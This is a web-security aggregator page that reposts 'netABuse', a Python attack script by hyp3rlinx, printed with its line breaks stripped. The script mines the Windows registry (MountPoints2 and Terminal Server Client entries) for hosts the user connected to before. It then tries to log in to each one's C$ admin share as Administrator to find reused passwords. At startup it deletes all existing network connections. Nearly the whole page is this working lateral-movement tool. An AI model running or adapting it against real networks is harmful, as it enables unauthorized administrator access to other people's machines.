HackDig : Dig high-quality web security articles for hackers

netABuse - Windows Insufficient Authentication Logic Scanner

2020-04-09 05:49
import os,re,time,signal,sysfrom subprocess import *from multiprocessing import Process#By John Page (aka hyp3rlinx)#Apparition Security#twitter.com/hyp3rlinx#Advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt #-----------------------------------#When a remote systems built-in Administrator account is enabled and both the remote and the target system#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.##MountPoints2 and Terminal server client hints in the Windows registry can help us.#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.#REG Query HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerMountPoints2 /F "##" (we want network logons)#MountPoints2 key entries are stored like '##$'#-----------------------------------------------------------BANNER="""               |            __ )                       __     _   __|    _     __    |   |   __|   _    |   |   __/  |     ___    |   |  |   | __    __/  _|  _| ___| __| _/    _ ____/  __,_| ____/ ___|                                       By Hyp3rlinx                                                                                                        ApparitionSec"""DRIVE="X"FINDME="The command completed successfully."REG_MOUNT2='REG Query HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerMountPoints2 /F "##"'REG_RDPUSERS="REG Query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers""+" /s"VULN_FOUND=set()DELAY=2   #Any lower and we may get inaccurate results.rdp_server_lst=[]#Return prior network logons to remote systems.def mountpoints2():    mntpoint2_connections=[]    try:        p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)        tmp = p.stdout.readlines()    except Exception as e:        print("[!] "+str(e))        return False    for x in tmp:        idx = x.find("##")        clean = x[idx:]        idx2 = clean.rfind("#")        ip = clean[2:idx2]        ip = re.sub(r"#.*[A-Z,a-z]","",ip)        if ip not in mntpoint2_connections:            mntpoint2_connections.append(ip)        mntpoint2_connections = list(filter(None, mntpoint2_connections))    p.kill()    return mntpoint2_connections #Terminal server client stores remote server connections.def rdp_svrs():    global rdp_server_lst    try:        p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)        tmp = p.stdout.readlines()        for key in tmp:            if key.find("Servers")!=-1:                pos = key.rfind("\")                srv = key[pos + 1:].replace("rn","").strip()                rdp_server_lst.append(srv)        p.kill()    except Exception as e:        print("[!] "+str(e))        return False    return True#Disconnectdef del_vuln_connection(ip):    try:        print("[!] Disconnecting vuln network logon connection.n")        call(r"net use "+DRIVE+":"+" /del")    except Exception as e:        print("[!] "+str(e))#Check connectiondef chk_connection(ip):    print("[+] Testing: "+ip)    sys.stdout.flush()    cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True)    stderr, stdout = cmd.communicate()    if "Reply from" in stderr and "Destination host unreachable" not in stderr:        print("[*] Target up!")        return True    else:        print("[!] Target unreachable :(")    return False #Test vulndef Test_Password_Reuse(ip):    print("[+] Testing "+ip + " the builtin Administrator account.n")    sys.stdout.flush()    try:        p = Popen("net use X: \\"+ip+"\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True)        err = p.stderr.readlines()            if err:            e = str(err)            if e.find("error 53")!=-1:                print("[*] Network path not foundn")                return            elif e.find("error 1219")!=-1:                print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.n")                return            elif e.find("error 85")!=-1:                print("[*] The local device name is already in use.n")                return            else:                print(e+"n")                        tmp = p.stdout.read()        if FINDME in tmp:            print("[*] Password reuse for the built-in Administrator found!")            print("[+] Connected to target: "+ ip)            VULN_FOUND.add(ip+":Administrator")            del_vuln_connection(ip)        p.kill()    except Exception as e:        print("[!] "+str(e))#Authenticatedef auth(ip):    action_process = Process(target=Test_Password_Reuse, args=(ip,))    action_process.start()    action_process.join(timeout=5)    action_process.terminate()if __name__ == "__main__":    print(BANNER)    print("[+] M$ Windows net use Logon Command")    print("[+] Insufficient Authentication Logic Scanner")    print("[+] By hyp3rlinxn")    print("[!] Deletes existing network logons")    print("[!] Scans environment for vuln machines.")    print("[!] To continue hit enter or ctrl+c to abort.")    raw_input("")        print("[+] Deleting any existing network logons to start clean.")        #Make sure no exist sessions already exist.    call(r"net use * /del /y")    sys.stdout.flush()    time.sleep(1)        #Grab previous connections from MountPoints2 if any.    rdp_svrs()    svrlst=mountpoints2()    if svrlst:        svrlst + rdp_server_lst    else:        svrlst = rdp_server_lst        if not svrlst:        print("[*] No MountPoints2 artifacts found, enter an IP.")        sys.stdout.flush()        ip=raw_input("[+] Target IP> ")        if chk_connection(ip):             auth(ip)    else:        #We have MountPoints2 or RDP Server list IP we can try.        for ip in svrlst:            if chk_connection(ip):                 auth(ip)                             time.sleep(DELAY)     if len(VULN_FOUND) != 0:        print("[*] Located the following vulnerable systems:")        sys.stdout.flush()        for v in VULN_FOUND:            print("[+] "+v)    else:        print("[+] All previous attempts failed, enter an IP and give it a shot!.")        sys.stdout.flush()        ip=raw_input("[+] Target IP> ")        if chk_connection(ip):             auth(ip)

Source: 2400400202-BLW/eussi/moc.ytirucesxc

Read:481 | Comments:0 | Tags:No Tag

“netABuse - Windows Insufficient Authentication Logic Scanner”0 Comments

Submit A Comment



Blog :

Verification Code:


Share high-quality web security related articles with you:)